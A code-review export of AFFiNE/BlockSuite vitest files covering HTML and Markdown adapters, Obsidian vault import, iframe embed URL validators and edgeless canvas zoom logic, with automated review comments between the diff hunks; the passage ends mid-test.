test('paragraph with br should split into multiple blocks', async () => {
const html = template(`<p>aaa<br>bbb<br>ccc</p>`);
const blockSnapshot: BlockSnapshot = {
type: 'block',
id: 'matchesReplaceMap[0]',
flavour: 'affine:note',
props: {
xywh: '[0,0,800,95]',
background: DefaultTheme.noteBackgrounColor,
index: 'a0',
hidden: false,
displayMode: NoteDisplayMode.DocAndEdgeless,
},
children: [
{
type: 'block',
id: 'matchesReplaceMap[1]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [{ insert: 'aaa' }],
},
},
children: [],
},
{
type: 'block',
id: 'matchesReplaceMap[2]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [{ insert: 'bbb' }],
},
},
children: [],
},
{
type: 'block',
id: 'matchesReplaceMap[3]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [{ insert: 'ccc' }],
},
},
children: [],
},
],
};
const htmlAdapter = new HtmlAdapter(createJob(), provider);
const rawBlockSnapshot = await htmlAdapter.toBlockSnapshot({
file: html,
});
expect(nanoidReplacement(rawBlockSnapshot)).toEqual(blockSnapshot);
});
test('paragraph with br should keep inline styles in each split line', async () => {
const html = template(
`<p><strong>aaa</strong><br><a href="https://www.google.com/">bbb</a><br><em>ccc</em></p>`
);
const blockSnapshot: BlockSnapshot = {
type: 'block',
id: 'matchesReplaceMap[0]',
flavour: 'affine:note',
props: {
xywh: '[0,0,800,95]',
background: DefaultTheme.noteBackgrounColor,
index: 'a0',
hidden: false,
displayMode: NoteDisplayMode.DocAndEdgeless,
},
children: [
{
type: 'block',
id: 'matchesReplaceMap[1]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [
{
insert: 'aaa',
attributes: {
bold: true,
},
},
],
},
},
children: [],
},
{
type: 'block',
id: 'matchesReplaceMap[2]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [
{
insert: 'bbb',
attributes: {
link: 'https://www.google.com/',
},
},
],
},
},
children: [],
},
{
type: 'block',
id: 'matchesReplaceMap[3]',
flavour: 'affine:paragraph',
props: {
type: 'text',
text: {
'$blocksuite:internal:text$': true,
delta: [
{
insert: 'ccc',
attributes: {
italic: true,
},
},
],
},
},
children: [],
},
],
};
const htmlAdapter = new HtmlAdapter(createJob(), provider);
const rawBlockSnapshot = await htmlAdapter.toBlockSnapshot({
file: html,
});
expect(nanoidReplacement(rawBlockSnapshot)).toEqual(blockSnapshot);
});
test('nested list', async () => {
const html = template(`<ul><li>111<ul><li>222</li></ul></li></ul>`);
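Review bot: Both new `<br>` tests use inputs where every `<br>` sits between two non-empty segments (`aaa<br>bbb<br>ccc`), so the splitting rule is left unspecified for a leading or trailing `<br>` and for `<br><br>`. Add one case for each and decide explicitly whether they produce empty paragraphs or are dropped. The styled test should also include an inline element that spans a break, such as `<strong>aaa<br>bbb</strong>`, to pin down whether the attribute is carried onto both resulting blocks.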
@@ -1,4 +1,10 @@
import { MarkdownTransformer } from '@blocksuite/affine/widgets/linked-doc';
import { readFileSync } from 'node:fs';
import { basename, resolve } from 'node:path';
import {
MarkdownTransformer,
ObsidianTransformer,
} from '@blocksuite/affine/widgets/linked-doc';
import {
DefaultTheme,
NoteDisplayMode,
@@ -8,13 +14,18 @@ import {
CalloutAdmonitionType,
CalloutExportStyle,
calloutMarkdownExportMiddleware,
docLinkBaseURLMiddleware,
embedSyncedDocMiddleware,
MarkdownAdapter,
titleMiddleware,
} from '@blocksuite/affine-shared/adapters';
import type { AffineTextAttributes } from '@blocksuite/affine-shared/types';
import type {
BlockSnapshot,
DeltaInsert,
DocSnapshot,
SliceSnapshot,
Store,
TransformerMiddleware,
} from '@blocksuite/store';
import { AssetsManager, MemoryBlobCRUD, Schema } from '@blocksuite/store';
@@ -29,6 +40,138 @@ import { testStoreExtensions } from '../utils/store.js';
const provider = getProvider();
function withRelativePath(file: File, relativePath: string): File {
Object.defineProperty(file, 'webkitRelativePath', {
value: relativePath,
writable: false,
});
return file;
}
function markdownFixture(relativePath: string): File {
return withRelativePath(
new File(
[
readFileSync(
resolve(import.meta.dirname, 'fixtures/obsidian', relativePath),
'utf8'
),
],
basename(relativePath),
{ type: 'text/markdown' }
),
`vault/${relativePath}`
);
}
function exportSnapshot(doc: Store): DocSnapshot {
const job = doc.getTransformer([
docLinkBaseURLMiddleware(doc.workspace.id),
titleMiddleware(doc.workspace.meta.docMetas),
]);
const snapshot = job.docToSnapshot(doc);
expect(snapshot).toBeTruthy();
return snapshot!;
}
function normalizeDeltaForSnapshot(
delta: DeltaInsert<AffineTextAttributes>[],
titleById: ReadonlyMap<string, string>
) {
return delta.map(item => {
const normalized: Record<string, unknown> = {
insert: item.insert,
};
if (item.attributes?.link) {
normalized.link = item.attributes.link;
}
if (item.attributes?.reference?.type === 'LinkedPage') {
normalized.reference = {
type: 'LinkedPage',
page: titleById.get(item.attributes.reference.pageId) ?? '<missing>',
...(item.attributes.reference.title
? { title: item.attributes.reference.title }
: {}),
};
}
if (item.attributes?.footnote) {
const reference = item.attributes.footnote.reference;
normalized.footnote = {
label: item.attributes.footnote.label,
reference:
reference.type === 'doc'
? {
type: 'doc',
page: reference.docId
? (titleById.get(reference.docId) ?? '<missing>')
: '<missing>',
}
: {
type: reference.type,
...(reference.title ? { title: reference.title } : {}),
...(reference.fileName ? { fileName: reference.fileName } : {}),
},
};
}
return normalized;
});
}
function simplifyBlockForSnapshot(
block: BlockSnapshot,
titleById: ReadonlyMap<string, string>
): Record<string, unknown> {
const simplified: Record<string, unknown> = {
flavour: block.flavour,
};
if (block.flavour === 'affine:paragraph' || block.flavour === 'affine:list') {
simplified.type = block.props.type;
const text = block.props.text as
| { delta?: DeltaInsert<AffineTextAttributes>[] }
| undefined;
simplified.delta = normalizeDeltaForSnapshot(text?.delta ?? [], titleById);
}
if (block.flavour === 'affine:callout') {
simplified.emoji = block.props.emoji;
}
if (block.flavour === 'affine:attachment') {
simplified.name = block.props.name;
simplified.style = block.props.style;
}
if (block.flavour === 'affine:image') {
simplified.sourceId = '<asset>';
}
const children = (block.children ?? [])
.filter(child => child.flavour !== 'affine:surface')
.map(child => simplifyBlockForSnapshot(child, titleById));
if (children.length) {
simplified.children = children;
}
return simplified;
}
function snapshotDocByTitle(
collection: TestWorkspace,
title: string,
titleById: ReadonlyMap<string, string>
) {
const meta = collection.meta.docMetas.find(meta => meta.title === title);
expect(meta).toBeTruthy();
const doc = collection.getDoc(meta!.id)?.getStore({ id: meta!.id });
expect(doc).toBeTruthy();
return simplifyBlockForSnapshot(exportSnapshot(doc!).blocks, titleById);
}
describe('snapshot to markdown', () => {
test('code', async () => {
const blockSnapshot: BlockSnapshot = {
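Review bot: `simplifyBlockForSnapshot` records nothing but `flavour` for `affine:bookmark`, and `normalizeDeltaForSnapshot` keeps only `title` and `fileName` for a non-doc footnote reference, so the stored snapshot cannot detect a change in the URL that an imported bookmark or footnote points to. Add the link target to the simplified output in both places (for the bookmark, assuming it is held in a `url` prop, which this hunk does not show); link targets are the part of an imported vault most worth pinning in a regression test.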
@@ -127,6 +270,94 @@ Hello world
expect(meta?.tags).toEqual(['a', 'b']);
});
test('preserves list text inside blockquotes without list blocks', async () => {
const markdown = `> **Shopping List:**
> - Apples
> - Bananas
> - Oranges
`;
const mdAdapter = new MarkdownAdapter(createJob(), provider);
const snapshot = await mdAdapter.toDocSnapshot({
file: markdown,
assets: new AssetsManager({ blob: new MemoryBlobCRUD() }),
});
expect(simplifyBlockForSnapshot(snapshot.blocks, new Map())).toMatchObject({
children: [
{
flavour: 'affine:note',
children: [
{
flavour: 'affine:paragraph',
type: 'quote',
delta: [
{ insert: 'Shopping List:' },
{ insert: '\n' },
{ insert: '- ' },
{ insert: 'Apples' },
{ insert: '\n' },
{ insert: '- ' },
{ insert: 'Bananas' },
{ insert: '\n' },
{ insert: '- ' },
{ insert: 'Oranges' },
],
},
],
},
],
});
const exported = await mdAdapter.fromDocSnapshot({
snapshot,
assets: new AssetsManager({ blob: new MemoryBlobCRUD() }),
});
expect(exported.file).toContain('> **Shopping List:**');
expect(exported.file).toContain('> \\- Apples');
expect(exported.file).toContain('> \\- Bananas');
expect(exported.file).toContain('> \\- Oranges');
});
test('imports obsidian vault fixtures', async () => {
const schema = new Schema().register(AffineSchemas);
const collection = new TestWorkspace();
collection.storeExtensions = testStoreExtensions;
collection.meta.initialize();
const attachment = withRelativePath(
new File([new Uint8Array([80, 75, 3, 4])], 'archive.zip', {
type: 'application/zip',
}),
'vault/archive.zip'
);
const { docIds } = await ObsidianTransformer.importObsidianVault({
collection,
schema,
importedFiles: [
markdownFixture('entry.md'),
markdownFixture('linked.md'),
attachment,
],
extensions: testStoreExtensions,
});
expect(docIds).toHaveLength(2);
const titleById = new Map(
collection.meta.docMetas.map(meta => [
meta.id,
meta.title ?? '<untitled>',
])
);
expect({
titles: collection.meta.docMetas
.map(meta => meta.title)
.sort((a, b) => (a ?? '').localeCompare(b ?? '')),
entry: snapshotDocByTitle(collection, 'entry', titleById),
}).toMatchSnapshot();
});
test('paragraph', async () => {
const blockSnapshot: BlockSnapshot = {
type: 'block',
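Review bot: In `imports obsidian vault fixtures` the attachment and both markdown fixtures all sit directly under `vault/`, and only the `entry` doc is snapshotted, so the test does not show how `importObsidianVault` resolves `![[...]]` and `[[...]]` targets when files live in subfolders or share a basename. Add a nested fixture (for example `vault/sub/linked.md` beside `vault/linked.md`) and snapshot `linked` as well, so that name resolution is pinned by the test rather than incidental to a flat layout.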
@@ -0,0 +1,92 @@
import { describe, expect, test } from 'vitest';
import { bilibiliConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/bilibili.js';
import { excalidrawConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/excalidraw.js';
import { genericConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/generic.js';
import { googleDocsConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/google-docs.js';
import { googleDriveConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/google-drive.js';
import { miroConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/miro.js';
import { spotifyConfig } from '../../../blocks/embed/src/embed-iframe-block/configs/providers/spotify.js';
describe('embed iframe provider config', () => {
test('validates final iframe URLs from oEmbed providers', () => {
expect(
spotifyConfig.validateIframeUrl?.(
'https://open.spotify.com/embed/track/0TK2YIli7K1leLovkQiNik'
)
).toBe(true);
expect(
spotifyConfig.validateIframeUrl?.(
'https://example.com/embed/track/0TK2YIli7K1leLovkQiNik'
)
).toBe(false);
});
test('validates provider-specific iframe URL shapes', () => {
expect(
googleDriveConfig.validateIframeUrl?.(
'https://drive.google.com/file/d/file-id/preview?usp=embed_googleplus'
)
).toBe(true);
expect(
googleDriveConfig.validateIframeUrl?.(
'https://drive.google.com/drive/folders/folder-id?usp=sharing'
)
).toBe(false);
expect(
bilibiliConfig.validateIframeUrl?.(
'https://player.bilibili.com/player.html?bvid=BV1xx411c7mD&autoplay=0'
)
).toBe(true);
expect(
bilibiliConfig.match(
'https://player.bilibili.com/player.html?aid=123&autoplay=0'
)
).toBe(true);
expect(
bilibiliConfig.buildOEmbedUrl(
'https://player.bilibili.com/video/BV1xx411c7mD'
)
).toBe(
'https://player.bilibili.com/player.html?bvid=BV1xx411c7mD&autoplay=0'
);
expect(
bilibiliConfig.validateIframeUrl?.(
'https://www.bilibili.com/video/BV1xx411c7mD'
)
).toBe(false);
expect(
googleDocsConfig.validateIframeUrl?.(
'https://docs.google.com/document/d/doc-id/edit?usp=sharing'
)
).toBe(true);
expect(
miroConfig.validateIframeUrl?.(
'https://miro.com/app/live-embed/board-id/'
)
).toBe(true);
expect(
excalidrawConfig.validateIframeUrl?.('https://excalidraw.com/#room-id')
).toBe(true);
});
test('generic iframe validation excludes affine and non-https URLs', () => {
expect(genericConfig.validateIframeUrl?.('https://example.com/embed')).toBe(
true
);
expect(genericConfig.validateIframeUrl?.('http://example.com/embed')).toBe(
false
);
expect(
genericConfig.validateIframeUrl?.('https://app.affine.pro/embed')
).toBe(false);
expect(genericConfig.validateIframeUrl?.('https://127.0.0.1/embed')).toBe(
false
);
expect(genericConfig.validateIframeUrl?.('https://localhost/embed')).toBe(
false
);
});
});
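Review bot: `googleDocsConfig`, `miroConfig` and `excalidrawConfig` each get only a `toBe(true)` assertion, so a `validateIframeUrl` that accepts every URL would pass for those three providers. Give each a rejecting case, as Spotify, Google Drive and Bilibili already have, and make at least one negative per provider a near-miss on the hostname rather than `example.com`, since the validator decides what may be loaded in an iframe. The generic test covers `127.0.0.1` and `localhost`; state in the test whether other loopback and private-range literals are meant to be rejected as well, and assert it either way.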
@@ -0,0 +1,770 @@
import { Bound } from '@blocksuite/global/gfx';
import { Viewport, viewportRuntimeConfig } from '@blocksuite/std/gfx';
import { afterEach, describe, expect, test, vi } from 'vitest';
import * as viewportModule from '../../../../../framework/std/src/gfx/viewport.js';
import * as viewportElementModule from '../../../../../framework/std/src/gfx/viewport-element.js';
import * as canvasRendererModule from '../../../../blocks/surface/src/renderer/canvas-renderer.js';
import {
paintPlaceholder,
syncCanvasSize,
} from '../../../../gfx/turbo-renderer/src/renderer-utils.js';
import type { ViewportLayoutTree } from '../../../../gfx/turbo-renderer/src/types.js';
const originalCaps = [...viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM];
const originalDevicePixelRatio = Object.getOwnPropertyDescriptor(
window,
'devicePixelRatio'
);
function setDevicePixelRatio(value: number) {
Object.defineProperty(window, 'devicePixelRatio', {
configurable: true,
value,
});
}
function createRect(width: number, height: number): DOMRect {
return {
width,
height,
left: 0,
top: 0,
right: width,
bottom: height,
x: 0,
y: 0,
toJSON: () => ({}),
} as DOMRect;
}
function createFakeBlockModel(
id: string,
x: number,
y: number,
w = 10,
h = 10
) {
return {
id,
elementBound: new Bound(x, y, w, h),
};
}
type PaintPlaceholderForTest = (
canvas: HTMLCanvasElement,
layout: ViewportLayoutTree,
viewport: {
zoom: number;
toViewCoord: (x: number, y: number) => [number, number];
}
) => void;
afterEach(() => {
viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM = [...originalCaps];
if (originalDevicePixelRatio) {
Object.defineProperty(window, 'devicePixelRatio', originalDevicePixelRatio);
}
vi.restoreAllMocks();
});
describe('edgeless canvas budget', () => {
test('requests canvas budget sync when zoom crosses an effective dpr bucket', () => {
viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM = [
[0.5, 1],
[0.8, 2],
];
expect(
'shouldSyncCanvasBudgetOnViewportUpdate' in canvasRendererModule
).toBe(true);
const shouldSyncCanvasBudgetOnViewportUpdate = (
canvasRendererModule as {
shouldSyncCanvasBudgetOnViewportUpdate: (
previousZoom: number,
nextZoom: number,
rawDpr?: number
) => boolean;
}
).shouldSyncCanvasBudgetOnViewportUpdate;
expect(shouldSyncCanvasBudgetOnViewportUpdate(0.95, 0.4, 2)).toBe(true);
expect(shouldSyncCanvasBudgetOnViewportUpdate(0.95, 0.75, 2)).toBe(false);
expect(shouldSyncCanvasBudgetOnViewportUpdate(0.45, 0.4, 2)).toBe(false);
expect(shouldSyncCanvasBudgetOnViewportUpdate(0.95, 0.4, 1)).toBe(false);
});
test('enables low-zoom survival mode only for active iOS gestures', () => {
expect('shouldUseLowZoomSurvivalMode' in canvasRendererModule).toBe(true);
const shouldUseLowZoomSurvivalMode = (
canvasRendererModule as {
shouldUseLowZoomSurvivalMode: (
isIOS: boolean,
zoom: number,
gestureActive: boolean
) => boolean;
}
).shouldUseLowZoomSurvivalMode;
expect(shouldUseLowZoomSurvivalMode(true, 0.4, true)).toBe(true);
expect(shouldUseLowZoomSurvivalMode(true, 0.6, true)).toBe(false);
expect(shouldUseLowZoomSurvivalMode(true, 0.4, false)).toBe(false);
expect(shouldUseLowZoomSurvivalMode(false, 0.4, true)).toBe(false);
});
test('does not enable canvas placeholders for low-zoom panning without zooming', () => {
expect('shouldRenderCanvasPlaceholders' in canvasRendererModule).toBe(true);
const shouldRenderCanvasPlaceholders = (
canvasRendererModule as {
shouldRenderCanvasPlaceholders: (params: {
isIOS: boolean;
zoom: number;
isPanning: boolean;
isZooming: boolean;
skipRefreshDuringGesture: boolean;
turboEnabled: boolean;
}) => boolean;
}
).shouldRenderCanvasPlaceholders;
expect(
shouldRenderCanvasPlaceholders({
isIOS: true,
zoom: 0.4,
isPanning: true,
isZooming: false,
skipRefreshDuringGesture: true,
turboEnabled: true,
})
).toBe(false);
expect(
shouldRenderCanvasPlaceholders({
isIOS: true,
zoom: 0.4,
isPanning: false,
isZooming: true,
skipRefreshDuringGesture: true,
turboEnabled: true,
})
).toBe(true);
});
test('shares one bypass decision for placeholder and render paths only during the low-zoom iOS landscape gesture or recovery window', () => {
expect('getStackingCanvasBypassState' in canvasRendererModule).toBe(true);
expect(
'shouldBypassStackingCanvasesDuringLowZoomGesture' in canvasRendererModule
).toBe(true);
const getStackingCanvasBypassState = (
canvasRendererModule as {
getStackingCanvasBypassState: (params: {
isIOS: boolean;
zoom: number;
gestureActive: boolean;
recoveryActive: boolean;
viewportWidth: number;
viewportHeight: number;
}) => boolean;
}
).getStackingCanvasBypassState;
const shouldBypassStackingCanvasesDuringLowZoomGesture = (
canvasRendererModule as {
shouldBypassStackingCanvasesDuringLowZoomGesture: (params: {
isIOS: boolean;
zoom: number;
gestureActive: boolean;
recoveryActive: boolean;
viewportWidth: number;
viewportHeight: number;
}) => boolean;
}
).shouldBypassStackingCanvasesDuringLowZoomGesture;
expect(
getStackingCanvasBypassState({
isIOS: true,
zoom: 0.4,
gestureActive: true,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(true);
expect(
getStackingCanvasBypassState({
isIOS: true,
zoom: 0.4,
gestureActive: false,
recoveryActive: true,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(true);
expect(
getStackingCanvasBypassState({
isIOS: true,
zoom: 0.4,
gestureActive: false,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(false);
expect(
shouldBypassStackingCanvasesDuringLowZoomGesture({
isIOS: true,
zoom: 0.4,
gestureActive: false,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(false);
expect(
getStackingCanvasBypassState({
isIOS: true,
zoom: 0.4,
gestureActive: true,
recoveryActive: false,
viewportWidth: 430,
viewportHeight: 932,
})
).toBe(false);
expect(
getStackingCanvasBypassState({
isIOS: true,
zoom: 0.6,
gestureActive: true,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(false);
expect(
getStackingCanvasBypassState({
isIOS: false,
zoom: 0.4,
gestureActive: true,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
})
).toBe(false);
});
test('gesture low-zoom landscape bypass detaches stacking canvases through the existing attachment path', () => {
expect(
'shouldBypassStackingCanvasesDuringLowZoomGesture' in canvasRendererModule
).toBe(true);
expect('getStackingCanvasAttachmentDiff' in canvasRendererModule).toBe(
true
);
const shouldBypassStackingCanvasesDuringLowZoomGesture = (
canvasRendererModule as {
shouldBypassStackingCanvasesDuringLowZoomGesture: (params: {
isIOS: boolean;
zoom: number;
gestureActive: boolean;
recoveryActive: boolean;
viewportWidth: number;
viewportHeight: number;
}) => boolean;
}
).shouldBypassStackingCanvasesDuringLowZoomGesture;
const getStackingCanvasAttachmentDiff = (
canvasRendererModule as {
getStackingCanvasAttachmentDiff: (params: {
canvases: HTMLCanvasElement[];
wasAttached: boolean;
shouldAttach: boolean;
}) => {
added: HTMLCanvasElement[];
removed: HTMLCanvasElement[];
};
}
).getStackingCanvasAttachmentDiff;
const canvases = [document.createElement('canvas')];
const shouldBypass = shouldBypassStackingCanvasesDuringLowZoomGesture({
isIOS: true,
zoom: 0.4,
gestureActive: true,
recoveryActive: false,
viewportWidth: 932,
viewportHeight: 430,
});
expect(shouldBypass).toBe(true);
expect(
getStackingCanvasAttachmentDiff({
canvases,
wasAttached: true,
shouldAttach: !shouldBypass,
})
).toEqual({
added: [],
removed: canvases,
});
});
test('uses overscan for main-canvas fallback culling and render origin', () => {
expect('getMainCanvasFallbackBounds' in canvasRendererModule).toBe(true);
const getMainCanvasFallbackBounds = (
canvasRendererModule as {
getMainCanvasFallbackBounds: (params: {
viewportBounds: Bound;
overscanViewportBounds: Bound;
}) => {
cullBound: Bound;
renderBound: Bound;
};
}
).getMainCanvasFallbackBounds;
const viewportBounds = new Bound(100, 200, 300, 150);
const overscanViewportBounds = new Bound(40, 170, 420, 210);
expect(
getMainCanvasFallbackBounds({
viewportBounds,
overscanViewportBounds,
})
).toEqual({
cullBound: overscanViewportBounds,
renderBound: overscanViewportBounds,
});
});
test('lays out overscan canvases relative to the exact viewport', () => {
expect('getCanvasViewportLayout' in canvasRendererModule).toBe(true);
const getCanvasViewportLayout = (
canvasRendererModule as {
getCanvasViewportLayout: (params: {
bound: Bound;
viewportBounds: Bound;
zoom: number;
viewScale: number;
dpr: number;
}) => {
actualHeight: number;
actualWidth: number;
height: number;
transform: string;
width: number;
};
}
).getCanvasViewportLayout;
expect(
getCanvasViewportLayout({
bound: new Bound(40, 170, 420, 210),
viewportBounds: new Bound(100, 200, 300, 150),
zoom: 1,
viewScale: 1,
dpr: 2,
})
).toEqual({
actualHeight: 420,
actualWidth: 840,
height: 210,
transform: 'translate(-60px, -30px) scale(1)',
width: 420,
});
});
test('computes stacking canvas DOM attachment diffs when bypass toggles', () => {
expect('getStackingCanvasAttachmentDiff' in canvasRendererModule).toBe(
true
);
const getStackingCanvasAttachmentDiff = (
canvasRendererModule as {
getStackingCanvasAttachmentDiff: (params: {
canvases: HTMLCanvasElement[];
wasAttached: boolean;
shouldAttach: boolean;
}) => {
added: HTMLCanvasElement[];
removed: HTMLCanvasElement[];
};
}
).getStackingCanvasAttachmentDiff;
const canvasA = document.createElement('canvas');
const canvasB = document.createElement('canvas');
const canvases = [canvasA, canvasB];
expect(
getStackingCanvasAttachmentDiff({
canvases,
wasAttached: true,
shouldAttach: false,
})
).toEqual({
added: [],
removed: canvases,
});
expect(
getStackingCanvasAttachmentDiff({
canvases,
wasAttached: false,
shouldAttach: true,
})
).toEqual({
added: canvases,
removed: [],
});
expect(
getStackingCanvasAttachmentDiff({
canvases,
wasAttached: true,
shouldAttach: true,
})
).toEqual({
added: [],
removed: [],
});
});
test('emits a lightweight zoom signal during gesture-skipped zoom updates so canvas budgets can shrink', () => {
viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM = [
[0.5, 1],
[0.8, 2],
];
const viewport = new Viewport();
viewport.SKIP_REFRESH_DURING_GESTURE = true;
const viewportUpdated = vi.fn();
const zoomUpdates: Array<{ previousZoom: number; zoom: number }> = [];
let lastCanvasBudgetZoom = viewport.zoom;
let budgetSyncCount = 0;
viewport.viewportUpdated.subscribe(viewportUpdated);
expect('zoomUpdated' in viewport).toBe(true);
const zoomUpdated = (
viewport as unknown as {
zoomUpdated: {
subscribe: (
callback: (update: { previousZoom: number; zoom: number }) => void
) => void;
};
}
).zoomUpdated;
zoomUpdated.subscribe(update => {
zoomUpdates.push(update);
if (
(
canvasRendererModule as {
shouldSyncCanvasBudgetOnViewportUpdate: (
previousZoom: number,
nextZoom: number,
rawDpr?: number
) => boolean;
}
).shouldSyncCanvasBudgetOnViewportUpdate(
lastCanvasBudgetZoom,
update.zoom,
2
)
) {
budgetSyncCount += 1;
}
lastCanvasBudgetZoom = update.zoom;
});
viewport.panning$.next(true);
viewport.setZoom(0.4, { x: 0, y: 0 }, false, false, true);
expect(viewportUpdated).not.toHaveBeenCalled();
expect(zoomUpdates).toEqual([{ previousZoom: 1, zoom: 0.4 }]);
expect(budgetSyncCount).toBe(1);
viewport.dispose();
});
test('keeps programmatic setZoom on the normal viewport update path in skip mode', () => {
const viewport = new Viewport();
viewport.SKIP_REFRESH_DURING_GESTURE = true;
const viewportUpdated = vi.fn();
const zoomUpdated = vi.fn();
viewport.viewportUpdated.subscribe(viewportUpdated);
viewport.zoomUpdated.subscribe(zoomUpdated);
viewport.setZoom(0.4, { x: 0, y: 0 });
expect(viewportUpdated).toHaveBeenCalledTimes(1);
expect(zoomUpdated).toHaveBeenCalledWith({ previousZoom: 1, zoom: 0.4 });
expect(viewport.panning$.value).toBe(false);
expect(viewport.zooming$.value).toBe(false);
viewport.dispose();
});
test('enables low-zoom block survival only while the gesture is still active', () => {
expect('shouldUseLowZoomBlockSurvivalMode' in viewportElementModule).toBe(
true
);
const shouldUseLowZoomBlockSurvivalMode = (
viewportElementModule as {
shouldUseLowZoomBlockSurvivalMode: (params: {
zoom: number;
skipRefreshDuringGesture: boolean;
gestureActive: boolean;
}) => boolean;
}
).shouldUseLowZoomBlockSurvivalMode;
expect(
shouldUseLowZoomBlockSurvivalMode({
zoom: 0.4,
skipRefreshDuringGesture: true,
gestureActive: true,
})
).toBe(true);
expect(
shouldUseLowZoomBlockSurvivalMode({
zoom: 0.4,
skipRefreshDuringGesture: true,
gestureActive: false,
})
).toBe(false);
});
test('keeps selected and one nearby viewport block active during low-zoom gesture survival', () => {
expect('getLowZoomGestureActiveModels' in viewportElementModule).toBe(true);
const getLowZoomGestureActiveModels = (
viewportElementModule as {
getLowZoomGestureActiveModels: (params: {
selectedModels: Set<{ id: string; elementBound: Bound }>;
viewportModels: Set<{ id: string; elementBound: Bound }>;
viewportBounds: Bound;
nearbyActiveBlockLimit: number;
nearbyDistanceRatio: number;
}) => Set<{ id: string; elementBound: Bound }>;
}
).getLowZoomGestureActiveModels;
const selected = createFakeBlockModel('selected', 10, 10);
const nearby = createFakeBlockModel('nearby', 28, 12);
const far = createFakeBlockModel('far', 78, 78);
const activeModels = getLowZoomGestureActiveModels({
selectedModels: new Set([selected]),
viewportModels: new Set([selected, nearby, far]),
viewportBounds: new Bound(0, 0, 100, 100),
nearbyActiveBlockLimit: 1,
nearbyDistanceRatio: 0.35,
});
expect([...activeModels].map(model => model.id).sort()).toEqual([
'nearby',
'selected',
]);
});
test('falls back to the nearest viewport block when nothing is selected', () => {
expect('getLowZoomGestureActiveModels' in viewportElementModule).toBe(true);
const getLowZoomGestureActiveModels = (
viewportElementModule as {
getLowZoomGestureActiveModels: (params: {
selectedModels: Set<{ id: string; elementBound: Bound }>;
viewportModels: Set<{ id: string; elementBound: Bound }>;
viewportBounds: Bound;
nearbyActiveBlockLimit: number;
nearbyDistanceRatio: number;
}) => Set<{ id: string; elementBound: Bound }>;
}
).getLowZoomGestureActiveModels;
const nearest = createFakeBlockModel('nearest', 46, 46);
const farther = createFakeBlockModel('farther', 78, 78);
const activeModels = getLowZoomGestureActiveModels({
selectedModels: new Set(),
viewportModels: new Set([nearest, farther]),
viewportBounds: new Bound(0, 0, 100, 100),
nearbyActiveBlockLimit: 1,
nearbyDistanceRatio: 0.35,
});
expect([...activeModels].map(model => model.id)).toEqual(['nearest']);
});
test('starts post-gesture recovery immediately once gesture signals fully settle', () => {
expect('getPostGestureRecoveryDelay' in viewportModule).toBe(true);
const getPostGestureRecoveryDelay = (
viewportModule as {
getPostGestureRecoveryDelay: (params: {
isPanning: boolean;
isZooming: boolean;
fallbackDelayMs: number;
}) => number;
}
).getPostGestureRecoveryDelay;
expect(
getPostGestureRecoveryDelay({
isPanning: false,
isZooming: false,
fallbackDelayMs: 220,
})
).toBe(0);
});
test('keeps fallback post-gesture delay while a gesture signal is still active', () => {
expect('getPostGestureRecoveryDelay' in viewportModule).toBe(true);
const getPostGestureRecoveryDelay = (
viewportModule as {
getPostGestureRecoveryDelay: (params: {
isPanning: boolean;
isZooming: boolean;
fallbackDelayMs: number;
}) => number;
}
).getPostGestureRecoveryDelay;
expect(
getPostGestureRecoveryDelay({
isPanning: true,
isZooming: false,
fallbackDelayMs: 220,
})
).toBe(220);
expect(
getPostGestureRecoveryDelay({
isPanning: false,
isZooming: true,
fallbackDelayMs: 220,
})
).toBe(220);
});
test('sizes turbo renderer canvas with effective dpr at low zoom', () => {
viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM = [
[0.5, 1],
[0.8, 2],
];
setDevicePixelRatio(2);
const canvas = document.createElement('canvas');
const host = document.createElement('div');
vi.spyOn(host, 'getBoundingClientRect').mockReturnValue(
createRect(200, 100)
);
(
syncCanvasSize as unknown as (
canvas: HTMLCanvasElement,
host: HTMLElement,
zoom: number
) => void
)(canvas, host, 0.4);
expect(canvas.width).toBe(200);
expect(canvas.height).toBe(100);
(
syncCanvasSize as unknown as (
canvas: HTMLCanvasElement,
host: HTMLElement,
zoom: number
) => void
)(canvas, host, 0.95);
expect(canvas.width).toBe(400);
expect(canvas.height).toBe(200);
});
test('paints turbo placeholders with effective dpr at low zoom', () => {
const previousTheme = document.documentElement.dataset.theme;
document.documentElement.dataset.theme = 'light';
try {
viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM = [
[0.5, 1],
[0.8, 2],
];
setDevicePixelRatio(2);
const canvas = document.createElement('canvas');
const fillRect = vi.fn();
const strokeRect = vi.fn();
let fillStyle = '';
let strokeStyle = '';
vi.spyOn(canvas, 'getContext').mockReturnValue({
get fillStyle() {
return fillStyle;
},
set fillStyle(value: string) {
fillStyle = value;
},
get strokeStyle() {
return strokeStyle;
},
set strokeStyle(value: string) {
strokeStyle = value;
},
fillRect,
strokeRect,
} as unknown as CanvasRenderingContext2D);
const layout: ViewportLayoutTree = {
roots: [
{
blockId: 'root',
type: 'affine:page',
layout: {
blockId: 'root',
type: 'affine:page',
rect: { x: 0, y: 0, w: 50, h: 20 },
},
children: [],
},
],
